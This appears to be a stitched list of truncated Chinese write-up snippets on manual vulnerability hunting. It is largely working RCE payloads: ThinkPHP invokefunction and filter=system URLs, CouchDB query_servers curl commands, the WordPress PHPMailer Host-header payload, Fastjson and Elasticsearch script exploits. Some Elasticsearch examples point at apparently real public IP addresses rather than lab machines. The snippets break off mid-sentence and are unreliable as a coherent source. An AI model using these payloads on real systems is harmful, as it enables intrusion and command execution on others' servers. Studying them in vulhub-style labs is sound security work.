手动漏洞挖掘 ###################################################################################### 手动漏洞挖掘原则[会比自动扫描器发现的漏洞要多,要全面] 1.每一个变量都进行尝试 2.所有头[如:cookie中的变量] 3.逐个变量删除 #####################################################################################…
ThinkPHP5.0.21&5.1.* 代码执行和命令执行漏洞利用 ThinkPHP5.0.21&5.1.*  exploit code execution and command execution vulnerabilities 5.0.21 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami ?s=index/\thi…
影响版本:小于 1.7.0 以及 小于 2.1.1 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户 依次执行如下请求即可触发任意命令执行: 其中,vulhub:vulhub为管理员账号密码. curl -X PUT 'http://vulhub:vulhub@192.168.49.2:5984/_config/query_servers/cmd' -d '"id >/tmp/success"' curl -X PU…
漏洞简述 当WordPress 使用 PHPMailer 组件向用户发送邮件.攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数).$run(系统调用函数)等构造payload,即可进行远程命令执行. 0x00漏洞影响 WordPress <= 4.6.0 PHPMailer < 5.2.18 0x01漏洞原理 主要是phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值…
环境搭建: 漏洞影响版本: fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞 环境地址: https://github.com/vulhub/vulhub/tree/master/fastjson/vuln 正常访问页面返回hello,world~ 此时抓包修改content-type为json格式,并post payload,即可执行rce 此时就能够创建success文件 前置知识: 研究这个漏洞之前,先熟悉一下阿里的这个fastjson库的基本用法 package m…
thinkphp5.1.1为例 1.代码执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2.命令执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=system&data=dir 各个版本的执行方式各不相同, 未测试的一些POC:…
测试url:http://190.196.67.252:9200/_search?pretty http://191.234.18.14:9200///_search?pretty POST提交 {“size”:1,”script_fields”: {“iswin”: {“script”:”java.lang.Math.class.forName(\”java.io.BufferedReader\”).getConstructor(java.io.Reader.class).newInstanc…
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站.也算是一个内容管理系统(CMS) 环境搭建 docker环境 (搭建可参考:https://www.cnblogs.com/BlogVice-2203/p/16977227.html) 靶场在vulhub即可下载 靶机centos7:192.168.31.230 攻击机kali: 192.168.31.153 导入后开启靶场 docker-compose…
漏洞检测 区分 Fastjson 和 Jackson {"name":"S","age":21} 和 {"name":"S","age":21,"agsbdkjada__ss_d":123} 我们向这个地址POST一个JSON对象,即可更新服务端的信息: curl http://your-ip:8090/ -H "Content-Type: applicat…
漏洞存在后台登录地方的找回密码页面:http://192.168.49.2:8080/wp-login.php?action=lostpassword 抓包进行修改包 输入一个存在的用户,然后点击获取新密码,bp抓post包 请求包的HOST处的参数值即是该漏洞的payload点 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directo…